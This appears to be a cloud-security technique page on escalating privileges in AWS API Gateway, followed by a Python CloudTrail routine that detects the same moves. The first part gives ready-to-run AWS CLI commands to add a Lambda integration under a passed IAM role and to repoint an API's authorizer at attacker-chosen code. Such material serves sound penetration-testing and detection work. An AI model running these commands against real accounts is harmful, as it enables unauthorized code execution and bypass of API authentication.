An attacker with the permissions apigateway:PutIntegration, apigateway:CreateDeployment and iam:PassRole can add a new Lambda integration, backed by an IAM role, to an existing API Gateway REST API. Once the change is deployed, the attacker triggers the Lambda function through the API (for example `https://<api-id>.execute-api.<region>.amazonaws.com/Prod/<path>`) to run arbitrary code and potentially reach resources the IAM role gives access to. Two practical caveats: the role passed in `--credentials` is assumed by API Gateway to invoke the function, so its trust policy must allow `apigateway.amazonaws.com` and it must grant `lambda:InvokeFunction` on the target; the function's code itself runs under the function's own execution role, which is where the reachable resources ultimately come from. Nothing takes effect until `create-deployment` pushes the new integration to a stage.
```bash
API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"

# Add a new Lambda proxy integration to the API Gateway REST API,
# executed under the passed IAM role (this is where iam:PassRole is consumed)
aws apigateway put-integration \
  --rest-api-id $API_ID \
  --resource-id $RESOURCE_ID \
  --http-method $HTTP_METHOD \
  --type AWS_PROXY \
  --integration-http-method POST \
  --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations \
  --credentials $LAMBDA_ROLE_ARN

# Create a deployment so the new integration goes live on the Prod stage
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
With apigateway:UpdateAuthorizer and apigateway:CreateDeployment, an attacker can instead repoint an existing Lambda authorizer at a function of their choosing, so the authentication/authorization decision for every request to the API is made by attacker-controlled code. Note that `update-authorizer` takes PATCH operations; there is no `--authorizer-uri` flag on that subcommand (only on `create-authorizer`).

```bash
API_ID="your-api-id"
AUTHORIZER_ID="your-authorizer-id"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"

# Replace the authorizer's Lambda URI with one pointing at the attacker's function
aws apigateway update-authorizer \
  --rest-api-id $API_ID \
  --authorizer-id $AUTHORIZER_ID \
  --patch-operations op=replace,path=/authorizerUri,value=arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations

# Create a deployment so the modified authorizer goes live on the Prod stage
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
```
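The defensive counterpart to both procedures above, as an added example that is not part of the original page: a small CloudTrail triage routine that flags a `PutIntegration` carrying a passed role in `credentials` (the only place the iam:PassRole target surfaces, since PassRole itself is not logged as its own event) and an `UpdateAuthorizer` that patches `/authorizerUri`, and marks whether the same principal deployed the API shortly afterwards. The records are constructed, and the `requestParameters` field names are assumptions modelled on the CLI flags above; confirm them against your own CloudTrail output before relying on the filter.

```python
"""Flag API Gateway privilege-escalation patterns in CloudTrail records.

Added example, not code from the original page. Record layout and the
requestParameters keys (restApiId, credentials, uri, patchOperations) are
assumptions modelled on the CLI flags; verify against real CloudTrail data.
"""
import json
from datetime import datetime, timedelta

# How long after a suspicious change a CreateDeployment still counts as "going live"
DEPLOY_WINDOW = timedelta(minutes=30)

# Constructed sample trail: attacker adds a Lambda integration under a passed
# role, repoints an authorizer, then deploys; a second user does a harmless MOCK change.
SAMPLE_TRAIL = json.dumps({"Records": [
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "PutIntegration",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/attacker"},
     "requestParameters": {"restApiId": "abc123", "resourceId": "r1", "httpMethod": "GET",
                           "type": "AWS_PROXY",
                           "uri": "arn:aws:apigateway:us-east-1:lambda:path/2015-03-31/functions/"
                                  "arn:aws:lambda:us-east-1:123456789012:function:evil/invocations",
                           "credentials": "arn:aws:iam::123456789012:role/lambda-role"}},
    {"eventTime": "2024-05-01T10:01:00Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "UpdateAuthorizer",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/attacker"},
     "requestParameters": {"restApiId": "abc123", "authorizerId": "auth1",
                           "patchOperations": [{"op": "replace", "path": "/authorizerUri",
                                                "value": "arn:aws:apigateway:us-east-1:lambda:path/2015-03-31/functions/"
                                                         "arn:aws:lambda:us-east-1:123456789012:function:evil/invocations"}]}},
    {"eventTime": "2024-05-01T10:02:00Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "CreateDeployment",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/attacker"},
     "requestParameters": {"restApiId": "abc123", "stageName": "Prod"}},
    {"eventTime": "2024-05-01T10:05:00Z", "eventSource": "apigateway.amazonaws.com",
     "eventName": "PutIntegration",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/developer"},
     "requestParameters": {"restApiId": "abc123", "resourceId": "r2", "httpMethod": "GET",
                           "type": "MOCK"}},
]})


def _ts(ev):
    return datetime.strptime(ev["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def _actor(ev):
    return ev.get("userIdentity", {}).get("arn", "unknown")


def _params(ev):
    return ev.get("requestParameters") or {}


def _deployed_after(change, events):
    """True if the same actor deployed the same REST API within DEPLOY_WINDOW of the change."""
    api = _params(change).get("restApiId")
    for ev in events:
        if (ev.get("eventName") == "CreateDeployment"
                and _params(ev).get("restApiId") == api
                and _actor(ev) == _actor(change)
                and timedelta(0) <= _ts(ev) - _ts(change) <= DEPLOY_WINDOW):
            return True
    return False


def find_apigw_privesc(events):
    """Return findings for integrations with a passed role and repointed authorizers."""
    events = sorted(events, key=_ts)
    findings = []
    for ev in events:
        if ev.get("eventSource") != "apigateway.amazonaws.com":
            continue
        p = _params(ev)
        name = ev.get("eventName")
        if name == "PutIntegration" and p.get("credentials"):
            # A role in 'credentials' means API Gateway will assume it to call the
            # backend; this is the passed role from iam:PassRole.
            findings.append({"type": "integration_with_passed_role", "actor": _actor(ev),
                             "restApiId": p.get("restApiId"), "role": p["credentials"],
                             "target": p.get("uri"), "deployed": _deployed_after(ev, events)})
        elif name == "UpdateAuthorizer":
            for op in p.get("patchOperations") or []:
                if op.get("path") == "/authorizerUri" and op.get("op") in ("replace", "add"):
                    findings.append({"type": "authorizer_uri_changed", "actor": _actor(ev),
                                     "restApiId": p.get("restApiId"),
                                     "authorizerId": p.get("authorizerId"),
                                     "target": op.get("value"),
                                     "deployed": _deployed_after(ev, events)})
    return findings


def load_sample():
    return json.loads(SAMPLE_TRAIL)["Records"]


if __name__ == "__main__":
    print(json.dumps(find_apigw_privesc(load_sample()), indent=2))
```

Run against a real trail by replacing `load_sample()` with the `Records` array of your CloudTrail files; the `deployed` flag is what separates a staged change from one that is already serving traffic, so it is the first thing to check when prioritising alerts.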